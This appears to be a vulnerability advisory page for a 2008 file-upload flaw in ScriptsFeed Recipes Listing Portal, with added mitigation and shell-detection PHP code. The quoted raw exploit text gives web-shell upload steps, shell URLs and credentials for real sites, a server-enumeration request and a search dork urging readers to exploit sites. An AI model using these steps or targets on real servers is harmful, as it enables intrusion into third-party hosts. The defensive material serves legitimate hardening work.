Vendor: Recipes Listing Portal
By: ZoRLu
CVSS: 8.8 (HIGH)
Type: Remote File Upload
CWE: 264
Product Name: Recipes Listing Portal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ScriptsFeed (SF) Recipes Listing Portal Remote File Upload

ScriptsFeed (SF) Recipes Listing Portal lets any authenticated user upload arbitrary files to the web server: the photo attached to a recipe is not restricted to image types, so a PHP file is accepted and stored under the web root. An attacker registers an account, logs in, chooses 'Add a Recipe' and submits a recipe with a PHP web shell as the photo. Under 'View your Recipes', right-clicking the photo and copying its link reveals where the upload was stored: /pictures/[id]your_shell.php, where the original file name is kept and prefixed with a numeric id (the prefix 1226598339 in the published demo URLs is a Unix timestamp falling on 13 November 2008, the disclosure date). Opening that URL in a browser executes the shell with the web server's privileges; in the published demo it was used to list the other virtual hosts on the same server.

Mitigation:

The upload handler should validate the photo server-side before storing it: accept only an allowlist of image extensions, check the file's actual content (MIME sniffing and image parsing) rather than the client-supplied name or Content-Type, assign a server-generated file name with a fixed image extension, and store uploads where the web server will not execute scripts (outside the web root, or in a directory with PHP execution disabled). Any existing /pictures/ directory should also be checked for files that are not images, since shells uploaded before a fix remain in place.
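As an added example, not the vendor's code (which is not reproduced on this page), the upload pattern the advisory describes is shown beside a hardened handler. The form field name `photo`, the `./pictures` directory and the `time() . $file['name']` naming scheme are assumptions; the naming scheme is only inferred from the `[id]your_shell.php` path and the demo URLs.

```php
<?php
// Added example; not code from the ScriptsFeed product. Assumptions: the recipe
// form posts the image in a field named "photo" and files are kept in ./pictures.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/pictures';   // assumed; matches the /pictures/ URLs in the advisory
const MAX_BYTES  = 2 * 1024 * 1024;

// The pattern the advisory implies (reconstructed, not the vendor's code): the
// client's file name and extension are kept, so "c.php" is stored as executable
// PHP under the web root, e.g. pictures/1226598339c.php.
function store_photo_unsafe(array $file): string
{
    $name = time() . $file['name'];
    move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name);
    return $name;
}

// Allowlist keyed by the MIME type fileinfo reports, with the extension the
// server will assign. The client-supplied name and type are never reused.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate an uploaded image and move it into UPLOAD_DIR under a random name.
 * Returns the stored file name, or throws on any failure.
 */
function store_recipe_photo(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 1. Sniff the content; $file['type'] and the original extension are attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('disallowed content type: ' . $mime);
    }

    // 2. Require a parseable image; a PHP file with only a forged JPEG header fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // 3. Server-chosen name: random, one allowlisted extension, no path components.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

// Usage inside the recipe form handler (request shape assumed).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['photo'])) {
    try {
        $stored = store_recipe_photo($_FILES['photo']);
        // store $stored with the recipe row; it is served as /pictures/<name>
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Photo rejected: ', htmlspecialchars($e->getMessage());
    }
}
```

Because the server assigns a `.jpg`/`.png`/`.gif` name, a polyglot that passes `getimagesize` still cannot be executed as PHP unless the web server maps those extensions to the interpreter. Pair the handler with a web server rule that disables script execution in the upload directory (for Apache with mod_php, `php_flag engine off` in a `.htaccess` under `pictures/`), so that a future handler bug does not become code execution again.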

Exploit-DB raw data:

[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] NOTE: Loneliness lost its meaning in my solitude :( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  (there are many sites, exploit them :) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

register on the site

register: http://localhost/script/register.php

then log in to the site

login: http://localhost/script/login.php

then click "Add a Recipe" and add a recipe

then click "View your Recipes", click your recipe, and it opens in a new page

right-click your photo, select Properties, and copy the photo link

paste it into your browser and go to your shell

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



RFU on the demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? (don't deface the index right away, poke around the server)

example:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases (the sites on the server)


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]
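The shell path pattern above (/pictures/[id]your_shell.php) gives an administrator something concrete to hunt for. The following CLI script is an added example, not part of the advisory or the vendor's product: it walks an upload directory and reports every file that is not the image it claims to be. The directory path is an assumption taken from the advisory's /pictures/ URLs.

```php
<?php
// Added example; not code from the advisory or the vendor. Run as:
//   php find_shells.php /var/www/script/pictures
// The path is an assumption; use whatever directory the portal stores photos in.
declare(strict_types=1);

const IMAGE_EXTS  = ['jpg', 'jpeg', 'png', 'gif'];
const IMAGE_MIMES = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Return [path => reason] for every file under $dir that should not be there:
 * a non-image extension (the advisory's [id]x.php case), content that fileinfo
 * does not identify as an image, or an image that also carries a PHP open tag
 * (a polyglot that would execute if the server ever mapped that extension to PHP).
 */
function find_suspicious_uploads(string $dir): array
{
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $hits  = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $f) {
        $path = $f->getPathname();
        $ext  = strtolower($f->getExtension());
        if (!in_array($ext, IMAGE_EXTS, true)) {
            $hits[$path] = "unexpected extension .$ext";
            continue;
        }
        $mime = $finfo->file($path);
        if (!in_array($mime, IMAGE_MIMES, true)) {
            $hits[$path] = "content is $mime, not an image";
            continue;
        }
        if (stripos((string) file_get_contents($path), '<?php') !== false) {
            $hits[$path] = 'image contains a PHP open tag';
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $hits = find_suspicious_uploads($argv[1]);
    foreach ($hits as $path => $why) {
        echo "$path: $why\n";
    }
    exit($hits === [] ? 0 : 1);
}
```

A non-zero exit status makes the script usable from cron or a deployment check. Any hit with a script extension should be treated as a confirmed compromise rather than a false positive: the file's modification time and the web server access log for its URL show when it was planted and what was run through it.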